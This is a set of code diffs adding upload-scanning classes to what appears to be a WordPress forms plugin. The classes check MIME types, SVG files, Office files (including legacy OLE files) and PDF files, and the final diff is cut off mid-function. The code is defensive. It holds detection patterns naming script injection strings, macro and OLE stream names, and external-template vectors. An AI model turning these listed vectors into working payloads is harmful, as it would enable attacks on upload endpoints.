--- a/src/Validation/FileSecurity/FileSecurityScanner.php
+++ b/src/Validation/FileSecurity/FileSecurityScanner.php
@@ -1,0 +1,215 @@
+<?php
+
+/**
+ * Orchestrator for file security scanning. Owns the always-on checks
+ * (magic-byte MIME, extension deny-list, MIME ↔ extension agreement) and
+ * dispatches to type-specific scanners when applicable.
+ *
+ * @package EightshiftForms\Validation\FileSecurity
+ */
+
+declare(strict_types=1);
+
+namespace EightshiftForms\Validation\FileSecurity;
+
+use EightshiftForms\Config\Config;
+use EightshiftForms\Helpers\HooksHelpers;
+use finfo;
+
+/**
+ * Single entry point for inspecting an uploaded file before it is persisted.
+ */
+final class FileSecurityScanner
+{
+	/**
+	 * Map of MIME prefix / exact MIME → type-specific scanner.
+	 *
+	 * @var array<string, class-string<FileSecurityScannerInterface>>
+	 */
+	private const TYPE_SCANNERS = [
+		'application/pdf' => PdfScanner::class,
+		'image/' => ImageScanner::class,
+		'application/vnd.openxmlformats-officedocument' => OfficeScanner::class,
+		'application/vnd.ms-excel' => OfficeScanner::class,
+		'application/msword' => OfficeScanner::class,
+		'application/vnd.ms-powerpoint' => OfficeScanner::class,
+		'text/csv' => CsvScanner::class,
+		'application/csv' => CsvScanner::class,
+		'application/zip' => ArchiveScanner::class,
+		'application/x-zip-compressed' => ArchiveScanner::class,
+		'text/plain' => TextScanner::class,
+	];
+
+	/**
+	 * Inspect a single file. Returns an empty string when the file is safe,
+	 * or a label key (resolvable via Labels::getLabel) describing the
+	 * rejection reason.
+	 *
+	 * @param string $filepath     Absolute path on disk (typically the PHP $_FILES tmp_name).
+	 * @param string $declaredName Original user-supplied filename.
+	 *
+	 * @return string Empty string = safe; otherwise label key.
+	 */
+	public function scan(string $filepath, string $declaredName): string
+	{
+		if ($filepath === '' || !\is_readable($filepath)) {
+			return 'validationFileScanFailed';
+		}
+
+		$extension = $this->getExtension($declaredName);
+		if ($this->isDenyListed($extension)) {
+			return 'validationFileExtensionDenied';
+		}
+
+		$detectedMime = $this->detectMime($filepath);
+		if ($detectedMime === '') {
+			return 'validationFileScanFailed';
+		}
+
+		if (!$this->extensionMatchesMime($extension, $detectedMime)) {
+			return 'validationFileMimeMismatch';
+		}
+
+		$scannerError = $this->runTypeScanner($filepath, $declaredName, $detectedMime);
+		if ($scannerError !== '') {
+			return $scannerError;
+		}
+
+		return '';
+	}
+
+	/**
+	 * Lowercase extension extracted from the declared filename.
+	 *
+	 * @param string $name Filename.
+	 *
+	 * @return string
+	 */
+	private function getExtension(string $name): string
+	{
+		$dot = \strrpos($name, '.');
+		if ($dot === false) {
+			return '';
+		}
+
+		return \strtolower(\substr($name, $dot + 1));
+	}
+
+	/**
+	 * Is the extension in the deny-list (built-in plus filter overrides)?
+	 *
+	 * @param string $extension Lowercase extension.
+	 *
+	 * @return bool
+	 */
+	private function isDenyListed(string $extension): bool
+	{
+		if ($extension === '') {
+			return false;
+		}
+
+		$denyList = \apply_filters( // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
+			HooksHelpers::getFilterName(['validation', 'fileSecurityDenyExtensions']),
+			Config::FILE_UPLOAD_DENY_EXTENSIONS
+		);
+
+		if (!\is_array($denyList)) {
+			$denyList = Config::FILE_UPLOAD_DENY_EXTENSIONS;
+		}
+
+		foreach ($denyList as $denied) {
+			if (\is_string($denied) && \strtolower(\ltrim($denied, '.')) === $extension) {
+				return true;
+			}
+		}
+
+		return false;
+	}
+
+	/**
+	 * Detect MIME via libmagic (finfo). Falls back to mime_content_type, then
+	 * to an empty string when neither is available.
+	 *
+	 * @param string $filepath Path to file.
+	 *
+	 * @return string MIME type, or empty string when detection fails.
+	 */
+	private function detectMime(string $filepath): string
+	{
+		if (\class_exists(finfo::class)) {
+			$finfo = new finfo(\FILEINFO_MIME_TYPE);
+			$mime = @$finfo->file($filepath); // phpcs:ignore WordPress.PHP.NoSilencedErrors.Discouraged
+			if (\is_string($mime) && $mime !== '') {
+				return \strtolower($mime);
+			}
+		}
+
+		if (\function_exists('mime_content_type')) {
+			$mime = @\mime_content_type($filepath); // phpcs:ignore WordPress.PHP.NoSilencedErrors.Discouraged
+			if (\is_string($mime) && $mime !== '') {
+				return \strtolower($mime);
+			}
+		}
+
+		return '';
+	}
+
+	/**
+	 * Does the declared extension agree with the detected MIME? Cross-checks
+	 * against the WordPress core MIME → extension map so that what the file
+	 * says it is and what the bytes say it is have to line up.
+	 *
+	 * @param string $extension    Lowercase extension from the declared filename.
+	 * @param string $detectedMime MIME detected from file bytes.
+	 *
+	 * @return bool
+	 */
+	private function extensionMatchesMime(string $extension, string $detectedMime): bool
+	{
+		if ($extension === '' || $detectedMime === '') {
+			return false;
+		}
+
+		$mimeMap = \wp_get_mime_types();
+		foreach ($mimeMap as $extPattern => $mime) {
+			if (\strtolower($mime) !== $detectedMime) {
+				continue;
+			}
+
+			foreach (\explode('|', $extPattern) as $allowedExt) {
+				if (\strtolower($allowedExt) === $extension) {
+					return true;
+				}
+			}
+		}
+
+		return false;
+	}
+
+	/**
+	 * Dispatch to the per-type scanner whose registered MIME matches.
+	 *
+	 * @param string $filepath     Path to file.
+	 * @param string $declaredName Original filename.
+	 * @param string $detectedMime Detected MIME.
+	 *
+	 * @return string Empty when safe, label key on rejection.
+	 */
+	private function runTypeScanner(string $filepath, string $declaredName, string $detectedMime): string
+	{
+		foreach (self::TYPE_SCANNERS as $needle => $scannerClass) {
+			if ($needle === $detectedMime || \strpos($detectedMime, $needle) === 0) {
+				/**
+				 * Scan with the type-specific scanner. It must return an empty string when the file is safe,
+				 * or a label key describing the rejection reason.
+				 *
+				 * @var FileSecurityScannerInterface $scanner
+				 */
+				$scanner = new $scannerClass();
+				return $scanner->scan($filepath, $declaredName, $detectedMime);
+			}
+		}
+
+		return '';
+	}
+}

--- a/src/Validation/FileSecurity/FileSecurityScanner.php
+++ b/src/Validation/FileSecurity/FileSecurityScanner.php
@@ -66,6 +66,14 @@ final class FileSecurityScanner
 			return 'validationFileScanFailed';
 		}
 
+		if (!$this->isMimeRegisteredOnSite($detectedMime)) {
+			// The detected MIME is genuine, but WordPress does not register it
+			// at all (e.g. `text/xml` on a default install). Saying "contents
+			// do not match extension" would be misleading — the contents are
+			// fine, the site just does not accept this type.
+			return 'validationFileMimeNotAllowed';
+		}
+
 		if (!$this->extensionMatchesMime($extension, $detectedMime)) {
 			return 'validationFileMimeMismatch';
 		}
@@ -152,6 +160,30 @@ final class FileSecurityScanner
 		}
 
 		return '';
+	}
+
+	/**
+	 * Is the detected MIME present anywhere in the site's MIME map? Used to
+	 * separate "MIME not allowed on this site" from "MIME does not match the
+	 * extension," which would otherwise share the same misleading label.
+	 *
+	 * @param string $detectedMime MIME detected from file bytes.
+	 *
+	 * @return bool
+	 */
+	private function isMimeRegisteredOnSite(string $detectedMime): bool
+	{
+		if ($detectedMime === '') {
+			return false;
+		}
+
+		foreach (\wp_get_mime_types() as $mime) {
+			if (\strtolower($mime) === $detectedMime) {
+				return true;
+			}
+		}
+
+		return false;
 	}
 
 	/**

--- a/src/Validation/FileSecurity/FileSecurityScanner.php
+++ b/src/Validation/FileSecurity/FileSecurityScanner.php
@@ -45,12 +45,14 @@ final class FileSecurityScanner
 	 * or a label key (resolvable via Labels::getLabel) describing the
 	 * rejection reason.
 	 *
-	 * @param string $filepath     Absolute path on disk (typically the PHP $_FILES tmp_name).
-	 * @param string $declaredName Original user-supplied filename.
+	 * @param string                           $filepath         Absolute path on disk (typically the PHP $_FILES tmp_name).
+	 * @param string                           $declaredName     Original user-supplied filename.
+	 * @param array<string, array<int, string>> $extraAllowedMimes Optional `extension => [mime, ...]` map supplementing `wp_get_mime_types()`.
+	 *                                                           Lets callers (e.g. admin transfer) accept formats WP core doesn't register.
 	 *
 	 * @return string Empty string = safe; otherwise label key.
 	 */
-	public function scan(string $filepath, string $declaredName): string
+	public function scan(string $filepath, string $declaredName, array $extraAllowedMimes = []): string
 	{
 		if ($filepath === '' || !\is_readable($filepath)) {
 			return 'validationFileScanFailed';
@@ -66,7 +68,7 @@ final class FileSecurityScanner
 			return 'validationFileScanFailed';
 		}
 
-		if (!$this->isMimeRegisteredOnSite($detectedMime)) {
+		if (!$this->isMimeRegisteredOnSite($detectedMime, $extraAllowedMimes)) {
 			// The detected MIME is genuine, but WordPress does not register it
 			// at all (e.g. `text/xml` on a default install). Saying "contents
 			// do not match extension" would be misleading — the contents are
@@ -74,7 +76,7 @@ final class FileSecurityScanner
 			return 'validationFileMimeNotAllowed';
 		}
 
-		if (!$this->extensionMatchesMime($extension, $detectedMime)) {
+		if (!$this->extensionMatchesMime($extension, $detectedMime, $extraAllowedMimes)) {
 			return 'validationFileMimeMismatch';
 		}
 
@@ -167,11 +169,12 @@ final class FileSecurityScanner
 	 * separate "MIME not allowed on this site" from "MIME does not match the
 	 * extension," which would otherwise share the same misleading label.
 	 *
-	 * @param string $detectedMime MIME detected from file bytes.
+	 * @param string                           $detectedMime      MIME detected from file bytes.
+	 * @param array<string, array<int, string>> $extraAllowedMimes Caller-supplied extension → MIMEs supplement.
 	 *
 	 * @return bool
 	 */
-	private function isMimeRegisteredOnSite(string $detectedMime): bool
+	private function isMimeRegisteredOnSite(string $detectedMime, array $extraAllowedMimes = []): bool
 	{
 		if ($detectedMime === '') {
 			return false;
@@ -183,6 +186,14 @@ final class FileSecurityScanner
 			}
 		}
 
+		foreach ($extraAllowedMimes as $mimes) {
+			foreach ((array) $mimes as $mime) {
+				if (\is_string($mime) && \strtolower($mime) === $detectedMime) {
+					return true;
+				}
+			}
+		}
+
 		return false;
 	}
 
@@ -191,12 +202,13 @@ final class FileSecurityScanner
 	 * against the WordPress core MIME → extension map so that what the file
 	 * says it is and what the bytes say it is have to line up.
 	 *
-	 * @param string $extension    Lowercase extension from the declared filename.
-	 * @param string $detectedMime MIME detected from file bytes.
+	 * @param string                           $extension         Lowercase extension from the declared filename.
+	 * @param string                           $detectedMime      MIME detected from file bytes.
+	 * @param array<string, array<int, string>> $extraAllowedMimes Caller-supplied extension → MIMEs supplement.
 	 *
 	 * @return bool
 	 */
-	private function extensionMatchesMime(string $extension, string $detectedMime): bool
+	private function extensionMatchesMime(string $extension, string $detectedMime, array $extraAllowedMimes = []): bool
 	{
 		if ($extension === '' || $detectedMime === '') {
 			return false;
@@ -210,6 +222,18 @@ final class FileSecurityScanner
 
 			foreach (\explode('|', $extPattern) as $allowedExt) {
 				if (\strtolower($allowedExt) === $extension) {
+					return true;
+				}
+			}
+		}
+
+		foreach ($extraAllowedMimes as $allowedExt => $mimes) {
+			if (\strtolower((string) $allowedExt) !== $extension) {
+				continue;
+			}
+
+			foreach ((array) $mimes as $mime) {
+				if (\is_string($mime) && \strtolower($mime) === $detectedMime) {
 					return true;
 				}
 			}

--- a/src/Validation/FileSecurity/FileSecurityScannerInterface.php
+++ b/src/Validation/FileSecurity/FileSecurityScannerInterface.php
@@ -1,0 +1,33 @@
+<?php
+
+/**
+ * Interface for file security scanners.
+ *
+ * @package EightshiftForms\Validation\FileSecurity
+ */
+
+declare(strict_types=1);
+
+namespace EightshiftForms\Validation\FileSecurity;
+
+/**
+ * Contract for a file security scanner.
+ *
+ * Implementations decide whether a single file on disk is acceptable for a
+ * public upload endpoint. They never sanitize or rewrite the file — they
+ * either accept it or return the label key that explains the rejection.
+ */
+interface FileSecurityScannerInterface
+{
+	/**
+	 * Scan a single file.
+	 *
+	 * @param string $filepath     Absolute path to the file on disk.
+	 * @param string $declaredName Original (user-supplied) filename, used to derive the extension.
+	 * @param string $detectedMime Magic-byte MIME type detected from the file contents.
+	 *
+	 * @return string Empty string when the file is considered safe;
+	 *                otherwise the label key (from Labels) describing the rejection reason.
+	 */
+	public function scan(string $filepath, string $declaredName, string $detectedMime): string;
+}

--- a/src/Validation/FileSecurity/ImageScanner.php
+++ b/src/Validation/FileSecurity/ImageScanner.php
@@ -1,0 +1,132 @@
+<?php
+
+/**
+ * Image security scanner. Confirms the file is actually parseable as the
+ * declared image type, and for SVG strips out the danger of scriptable
+ * payloads.
+ *
+ * @package EightshiftForms\Validation\FileSecurity
+ */
+
+declare(strict_types=1);
+
+namespace EightshiftForms\Validation\FileSecurity;
+
+/**
+ * Scans raster and vector image files.
+ */
+final class ImageScanner implements FileSecurityScannerInterface
+{
+	/**
+	 * MIME types this scanner handles as raster images (validated via getimagesize).
+	 *
+	 * @var array<int, string>
+	 */
+	private const RASTER_MIMES = [
+		'image/jpeg',
+		'image/png',
+		'image/gif',
+		'image/webp',
+		'image/bmp',
+		'image/x-ms-bmp',
+		'image/tiff',
+	];
+
+	/**
+	 * SVG MIME types — these need XML inspection, not getimagesize.
+	 *
+	 * @var array<int, string>
+	 */
+	private const SVG_MIMES = [
+		'image/svg+xml',
+		'image/svg',
+	];
+
+	/**
+	 * Patterns that disqualify an SVG. Case-insensitive substring checks
+	 * keep this resilient to obfuscation with whitespace inside tags.
+	 *
+	 * @var array<int, string>
+	 */
+	private const SVG_DANGER_PATTERNS = [
+		'<script',
+		'<foreignobject',
+		'<iframe',
+		'<embed',
+		'<object',
+		'javascript:',
+		'data:text/html',
+	];
+
+	/**
+	 * Scan a single file.
+	 *
+	 * @param string $filepath     Absolute path to the file on disk.
+	 * @param string $declaredName Original (user-supplied) filename, used to derive the extension.
+	 * @param string $detectedMime Magic-byte MIME type detected from the file contents.
+	 *
+	 * @return string Empty string when the file is considered safe;
+	 *                otherwise the label key (from Labels) describing the rejection reason.
+	 */
+	public function scan(string $filepath, string $declaredName, string $detectedMime): string
+	{
+		if (\in_array($detectedMime, self::SVG_MIMES, true)) {
+			return $this->scanSvg($filepath);
+		}
+
+		if (\in_array($detectedMime, self::RASTER_MIMES, true)) {
+			return $this->scanRaster($filepath);
+		}
+
+		// Not a known image MIME; the orchestrator already rejected via the
+		// extension/MIME match step, so this branch is defensive.
+		return '';
+	}
+
+	/**
+	 * Raster check: ensure the file actually decodes as an image. getimagesize
+	 * parses headers and rejects truncated, polyglot or malformed files.
+	 *
+	 * @param string $filepath Path to file.
+	 *
+	 * @return string Empty when safe, label key when not.
+	 */
+	private function scanRaster(string $filepath): string
+	{
+		$info = @\getimagesize($filepath); // phpcs:ignore WordPress.PHP.NoSilencedErrors.Discouraged
+		if (!\is_array($info) || empty($info[0]) || empty($info[1])) {
+			return 'validationFileImageUnsafe';
+		}
+
+		return '';
+	}
+
+	/**
+	 * SVG check: parse the XML and reject any embedded scripting vectors.
+	 *
+	 * @param string $filepath Path to file.
+	 *
+	 * @return string Empty when safe, label key when not.
+	 */
+	private function scanSvg(string $filepath): string
+	{
+		$contents = @\file_get_contents($filepath); // phpcs:ignore WordPress.PHP.NoSilencedErrors.Discouraged, WordPress.WP.AlternativeFunctions.file_get_contents_file_get_contents
+		if (!\is_string($contents) || $contents === '') {
+			return 'validationFileScanFailed';
+		}
+
+		$haystack = \strtolower($contents);
+		foreach (self::SVG_DANGER_PATTERNS as $pattern) {
+			if (\strpos($haystack, $pattern) !== false) {
+				return 'validationFileImageUnsafe';
+			}
+		}
+
+		// On/event handlers (onload=, onclick=, etc.) — only flag inside tags.
+		if (\preg_match('/<[^>]+\son[a-z]+\s*=/i', $contents) === 1) {
+			return 'validationFileImageUnsafe';
+		}
+
+		return '';
+	}
+}

--- a/src/Validation/FileSecurity/OfficeScanner.php
+++ b/src/Validation/FileSecurity/OfficeScanner.php
@@ -1,0 +1,85 @@
+<?php
+
+/**
+ * Office (OOXML) security scanner. Office documents are ZIP archives — this
+ * scanner enumerates internal members and rejects macros, embedded OLE
+ * objects and externally-targeted relationship references.
+ *
+ * @package EightshiftForms\Validation\FileSecurity
+ */
+
+declare(strict_types=1);
+
+namespace EightshiftForms\Validation\FileSecurity;
+
+use ZipArchive;
+
+/**
+ * Scans .docx / .xlsx / .pptx archives.
+ */
+final class OfficeScanner implements FileSecurityScannerInterface
+{
+	/**
+	 * Suffix patterns that disqualify the document outright (macro bodies,
+	 * embedded OLE binaries). Compared case-insensitively against entry names.
+	 *
+	 * @var array<int, string>
+	 */
+	private const FORBIDDEN_ENTRY_SUFFIXES = [
+		'vbaproject.bin',
+		'/oleobject',
+		'oleobject.bin',
+		'activex',
+		'/embeddings/',
+	];
+
+	/**
+	 * Scan a single file.
+	 *
+	 * @param string $filepath     Absolute path to the file on disk.
+	 * @param string $declaredName Original (user-supplied) filename, used to derive the extension.
+	 * @param string $detectedMime Magic-byte MIME type detected from the file contents.
+	 *
+	 * @return string Empty string when the file is considered safe;
+	 *                otherwise the label key (from Labels) describing the rejection reason.
+	 */
+	public function scan(string $filepath, string $declaredName, string $detectedMime): string
+	{
+		if (!\class_exists(ZipArchive::class)) {
+			return 'validationFileScanFailed';
+		}
+
+		$zip = new ZipArchive();
+		$opened = $zip->open($filepath, ZipArchive::RDONLY);
+		if ($opened !== true) {
+			return 'validationFileOfficeUnsafe';
+		}
+
+		try {
+			for ($i = 0; $i < $zip->numFiles; $i++) {
+				$entryName = (string) $zip->getNameIndex($i);
+				$lower = \strtolower($entryName);
+
+				foreach (self::FORBIDDEN_ENTRY_SUFFIXES as $needle) {
+					if (\strpos($lower, $needle) !== false) {
+						return 'validationFileOfficeUnsafe';
+					}
+				}
+
+				// Relationship files describe links between document parts.
+				// External TargetMode is the documented vector for
+				// auto-loaded remote payloads (DDE, template injection).
+				if (\substr($lower, -5) === '.rels') {
+					$body = (string) $zip->getFromIndex($i);
+					if ($body !== '' && \stripos($body, 'targetmode="external"') !== false) {
+						return 'validationFileOfficeUnsafe';
+					}
+				}
+			}
+		} finally {
+			$zip->close();
+		}
+
+		return '';
+	}
+}

--- a/src/Validation/FileSecurity/OfficeScanner.php
+++ b/src/Validation/FileSecurity/OfficeScanner.php
@@ -1,9 +1,18 @@
 <?php
 
 /**
- * Office (OOXML) security scanner. Office documents are ZIP archives — this
- * scanner enumerates internal members and rejects macros, embedded OLE
- * objects and externally-targeted relationship references.
+ * Office security scanner.
+ *
+ * Office files come in two structurally different containers and we have to
+ * inspect each on its own terms:
+ *
+ *   - Office Open XML (`.docx/.xlsx/.pptx`) is a ZIP. We enumerate members
+ *     and reject macro bodies, embedded OLE binaries and externally-targeted
+ *     relationship references.
+ *   - Legacy Office (`.doc/.xls/.ppt`) is OLE Compound File Binary Format
+ *     (CFBF). It is not a ZIP, so we read the raw bytes and look for the
+ *     canonical UTF-16LE stream names that indicate macros or embedded OLE
+ *     payloads.
  *
  * @package EightshiftForms\Validation\FileSecurity
  */
@@ -15,13 +24,13 @@ namespace EightshiftForms\Validation\FileSecurity;
 use ZipArchive;
 
 /**
- * Scans .docx / .xlsx / .pptx archives.
+ * Scans .docx / .xlsx / .pptx archives and legacy .doc / .xls / .ppt files.
  */
 final class OfficeScanner implements FileSecurityScannerInterface
 {
 	/**
-	 * Suffix patterns that disqualify the document outright (macro bodies,
-	 * embedded OLE binaries). Compared case-insensitively against entry names.
+	 * OOXML member-name suffixes that disqualify the document outright
+	 * (macro bodies, embedded OLE binaries). Compared case-insensitively.
 	 *
 	 * @var array<int, string>
 	 */
@@ -31,6 +40,27 @@ final class OfficeScanner implements FileSecurityScannerInterface
 		'oleobject.bin',
 		'activex',
 		'/embeddings/',
+	];
+
+	/**
+	 * CFBF (OLE Compound File) magic. Identifies legacy `.doc/.xls/.ppt`.
+	 */
+	private const CFBF_MAGIC = "\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1";
+
+	/**
+	 * UTF-8 stream names (encoded to UTF-16LE at runtime) whose presence in a
+	 * CFBF container indicates VBA macros or embedded OLE payloads. The
+	 * leading `\x01` for system streams is preserved as part of the needle.
+	 *
+	 * @var array<int, string>
+	 */
+	private const CFBF_DANGEROUS_STREAMS = [
+		'Macros',
+		'_VBA_PROJECT',
+		'_VBA_PROJECT_CUR',
+		'ObjectPool',
+		"\x01Ole10Native",
+		"\x01CompObjOle",
 	];
 
 	/**
@@ -44,6 +74,48 @@ final class OfficeScanner implements FileSecurityScannerInterface
 	 *                otherwise the label key (from Labels) describing the rejection reason.
 	 */
 	public function scan(string $filepath, string $declaredName, string $detectedMime): string
+	{
+		$header = $this->readHeader($filepath, 8);
+		if ($header === '') {
+			return 'validationFileScanFailed';
+		}
+
+		if (\strncmp($header, self::CFBF_MAGIC, 8) === 0) {
+			return $this->scanCfbf($filepath);
+		}
+
+		return $this->scanOoxml($filepath);
+	}
+
+	/**
+	 * Read the first $bytes of the file without loading the whole thing.
+	 *
+	 * @param string $filepath Path to file.
+	 * @param int    $bytes    Number of bytes to read.
+	 *
+	 * @return string Bytes read, or empty string on failure.
+	 */
+	private function readHeader(string $filepath, int $bytes): string
+	{
+		$handle = @\fopen($filepath, 'rb'); // phpcs:ignore WordPress.PHP.NoSilencedErrors.Discouraged, WordPress.WP.AlternativeFunctions.file_system_operations_fopen
+		if ($handle === false) {
+			return '';
+		}
+
+		$header = (string) \fread($handle, $bytes); // phpcs:ignore WordPress.WP.AlternativeFunctions.file_system_operations_fread
+		\fclose($handle); // phpcs:ignore WordPress.WP.AlternativeFunctions.file_system_operations_fclose
+
+		return $header;
+	}
+
+	/**
+	 * Scan a ZIP-based OOXML document.
+	 *
+	 * @param string $filepath Path to file.
+	 *
+	 * @return string Empty string when safe, label key on rejection.
+	 */
+	private function scanOoxml(string $filepath): string
 	{
 		if (!\class_exists(ZipArchive::class)) {
 			return 'validationFileScanFailed';
@@ -81,5 +153,50 @@ final class OfficeScanner implements FileSecurityScannerInterface
 		}
 
 		return '';
+	}
+
+	/**
+	 * Scan a legacy CFBF (OLE Compound File) document by raw-byte substring
+	 * match on the UTF-16LE encoding of known macro / embedded-object stream
+	 * names. Avoids depending on a full OLE parser while still catching the
+	 * canonical attack vectors.
+	 *
+	 * @param string $filepath Path to file.
+	 *
+	 * @return string Empty string when safe, label key on rejection.
+	 */
+	private function scanCfbf(string $filepath): string
+	{
+		$contents = @\file_get_contents($filepath); // phpcs:ignore WordPress.PHP.NoSilencedErrors.Discouraged, WordPress.WP.AlternativeFunctions.file_get_contents_file_get_contents
+		if (!\is_string($contents) || $contents === '') {
+			return 'validationFileScanFailed';
+		}
+
+		foreach (self::CFBF_DANGEROUS_STREAMS as $name) {
+			$needle = $this->toUtf16Le($name);
+			if ($needle !== '' && \strpos($contents, $needle) !== false) {
+				return 'validationFileOfficeUnsafe';
+			}
+		}
+
+		return '';
+	}
+
+	/**
+	 * Encode a UTF-8 string to UTF-16LE without a BOM. CFBF directory entries
+	 * store stream names in this encoding.
+	 *
+	 * @param string $value UTF-8 input.
+	 *
+	 * @return string UTF-16LE bytes, or empty string when conversion fails.
+	 */
+	private function toUtf16Le(string $value): string
+	{
+		if (!\function_exists('mb_convert_encoding')) {
+			return '';
+		}
+
+		$encoded = \mb_convert_encoding($value, 'UTF-16LE', 'UTF-8');
+		return \is_string($encoded) ? $encoded : '';
 	}
 }

--- a/src/Validation/FileSecurity/PdfScanner.php
+++ b/src/Validation/FileSecurity/PdfScanner.php
@@ -1,0 +1,151 @@
+<?php
+
+/**
+ * PDF security scanner. Detects scriptable / networked / executable PDF
+ * dictionary keys in both uncompressed bodies and (when qpdf is available)
+ * compressed object streams.
+ *
+ * @package EightshiftForms\Validation\FileSecurity
+ */
+
+declare(strict_types=1);
+
+namespace EightshiftForms\Validation\FileSecurity;
+
+use EightshiftForms\Config\Config;
+use EightshiftForms\Helpers\HooksHelpers;
+
+/**
+ * Scans PDF files for dangerous structures.
+ */
+final class PdfScanner implements FileSecurityScannerInterface
+{
+	/**
+	 * Scan a single file.
+	 *
+	 * @param string $filepath     Absolute path to the file on disk.
+	 * @param string $declaredName Original (user-supplied) filename, used to derive the extension.
+	 * @param string $detectedMime Magic-byte MIME type detected from the file contents.
+	 *
+	 * @return string Empty string when the file is considered safe;
+	 *                otherwise the label key (from Labels) describing the rejection reason.
+	 */
+	public function scan(string $filepath, string $declaredName, string $detectedMime): string
+	{
+		$contents = $this->readFile($filepath);
+		if ($contents === '') {
+			return 'validationFileScanFailed';
+		}
+
+		if (\strncmp($contents, '%PDF-', 5) !== 0) {
+			return 'validationFileMimeMismatch';
+		}
+
+		if ($this->containsDangerousKey($contents)) {
+			return 'validationFilePdfUnsafe';
+		}
+
+		// Compressed object streams hide content from the raw scan. qpdf
+		// expands them so the raw scan can run again on the expanded form.
+		$expanded = $this->expandWithQpdf($filepath);
+		if ($expanded !== null && $this->containsDangerousKey($expanded)) {
+			return 'validationFilePdfUnsafe';
+		}
+
+		return '';
+	}
+
+	/**
+	 * Read the whole file. PDFs that exceed PHP's memory limit are a problem
+	 * regardless of content — let the caller's existing maxSize gate that.
+	 *
+	 * @param string $filepath Path to file.
+	 *
+	 * @return string Contents, or empty string on failure.
+	 */
+	private function readFile(string $filepath): string
+	{
+		$contents = @\file_get_contents($filepath); // phpcs:ignore WordPress.PHP.NoSilencedErrors.Discouraged, WordPress.WP.AlternativeFunctions.file_get_contents_file_get_contents
+		return \is_string($contents) ? $contents : '';
+	}
+
+	/**
+	 * Does the haystack contain any of the documented dangerous PDF keys?
+	 *
+	 * @param string $haystack PDF bytes (raw or qpdf-expanded).
+	 *
+	 * @return bool
+	 */
+	private function containsDangerousKey(string $haystack): bool
+	{
+		foreach (Config::FILE_UPLOAD_PDF_DANGEROUS_KEYS as $key) {
+			if (\strpos($haystack, $key) !== false) {
+				return true;
+			}
+		}
+
+		return false;
+	}
+
+	/**
+	 * Run qpdf to produce an uncompressed copy on stdout, so dangerous keys
+	 * that live inside Flate-compressed object streams are visible to the
+	 * raw scan. Returns null when qpdf is unavailable or fails.
+	 *
+	 * @param string $filepath Path to file.
+	 *
+	 * @return string|null Uncompressed PDF bytes, or null when qpdf is unavailable.
+	 */
+	private function expandWithQpdf(string $filepath): ?string
+	{
+		$useQpdf = \apply_filters(HooksHelpers::getFilterName(['validation', 'fileSecurityPdfUseQpdf']), true); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
+		if ($useQpdf === false) {
+			return null;
+		}
+
+		if (!\function_exists('proc_open')) {
+			return null;
+		}
+
+		$binary = FileSecurityDiagnostics::getQpdfBinary();
+
+		if ($binary === '') {
+			return null;
+		}
+
+		return $this->runProcess(
+			[$binary, '--qdf', '--object-streams=disable', $filepath, '-']
+		);
+	}
+
+	/**
+	 * Run a child process with an explicit argv (no shell), capture stdout.
+	 *
+	 * @param array<int, string> $argv Command and arguments.
+	 *
+	 * @return string|null Stdout contents, or null on failure.
+	 */
+	private function runProcess(array $argv): ?string
+	{
+		$descriptors = [
+			0 => ['pipe', 'r'],
+			1 => ['pipe', 'w'],
+			2 => ['pipe', 'w'],
+		];
+
+		$pipes = [];
+		$process = \proc_open($argv, $descriptors, $pipes); // phpcs:ignore WordPress.PHP.DiscouragedPHPFunctions.system_calls_proc_open
+
+		if (!\is_resource($process)) {
+			return null;
+		}
+
+		\fclose($pipes[0]); // phpcs:ignore WordPress.WP.AlternativeFunctions.file_system_operations_fclose
+		$output = \stream_get_contents($pipes[1]);
+		\fclose($pipes[1]); // phpcs:ignore WordPress.WP.AlternativeFunctions.file_system_operations_fclose
+		\fclose($pipes[2]); // phpcs:ignore WordPress.WP.AlternativeFunctions.file_system_operations_fclose
+		\proc_close($process);
+
+		return \is_string($output) && $output !== '' ? $output : null;
+	}
+}

--- a/src/Validation/FileSecurity/PdfScanner.php
+++ b/src/Validation/FileSecurity/PdfScanner.php
@@ -72,6 +72,12 @@ final class PdfScanner implements FileSecurityScannerInterface
 	/**
 	 * Does the haystack contain any of the documented dangerous PDF keys?
 	 *
+	 * Matches the key only when it is followed by a PDF name-token delimiter
+	 * (whitespace, `/`, `<`, `[`, `(`, `%`). This avoids substring-style false
+	 * positives where the key appears inside a longer PDF name — most commonly
+	 * a font subset prefix like `/AAAAAA+GentiumPlus` which would otherwise
+	 * match `/AA`.
+	 *
 	 * @param string $haystack PDF bytes (raw or qpdf-expanded).
 	 *
 	 * @return bool
@@ -79,7 +85,8 @@ final class PdfScanner implements FileSecurityScannerInterface
 	private function containsDangerousKey(string $haystack): bool
 	{
 		foreach (Config::FILE_UPLOAD_PDF_DANGEROUS_KEYS as $key) {
-			if (\strpos($haystack, $key) !== false) {
+			$pattern = '/' . \preg_quote($key, '/') . '(?=[\s\/<\[(%])/';
+			if (\preg_match($pattern, $haystack) === 1) {
 				return true;
 			}
 		}

--- a/src/Validation/FileSecurity/PdfScanner.php
+++ b/src/Validation/FileSecurity/PdfScanner.php
@@ -148,11 +148,55 @@ final class PdfScanner implements FileSecurityScannerInterface
 		}
 
 		\fclose($pipes[0]); // phpcs:ignore WordPress.WP.AlternativeFunctions.file_system_operations_fclose
-		$output = \stream_get_contents($pipes[1]);
+
+		\stream_set_blocking($pipes[1], false);
+		\stream_set_blocking($pipes[2], false);
+
+		$output = '';
+		$errorOutput = '';
+
+		while (!\feof($pipes[1]) || !\feof($pipes[2])) {
+			$read = [];
+
+			if (!\feof($pipes[1])) {
+				$read[] = $pipes[1];
+			}
+
+			if (!\feof($pipes[2])) {
+				$read[] = $pipes[2];
+			}
+
+			if ($read === []) {
+				break;
+			}
+
+			$write = null;
+			$except = null;
+			$ready = \stream_select($read, $write, $except, null);
+
+			if ($ready === false) {
+				break;
+			}
+
+			foreach ($read as $stream) {
+				$chunk = \stream_get_contents($stream);
+
+				if (!\is_string($chunk) || $chunk === '') {
+					continue;
+				}
+
+				if ($stream === $pipes[1]) {
+					$output .= $chunk;
+				} else {
+					$errorOutput .= $chunk;
+				}
+			}
+		}
+
 		\fclose($pipes[1]); // phpcs:ignore WordPress.WP.AlternativeFunctions.file_system_operations_fclose
 		\fclose($pipes[2]); // phpcs:ignore WordPress.WP.AlternativeFunctions.file_system_operations_fclose
-		\proc_close($process);
+		$exitCode = \proc_close($process);
 
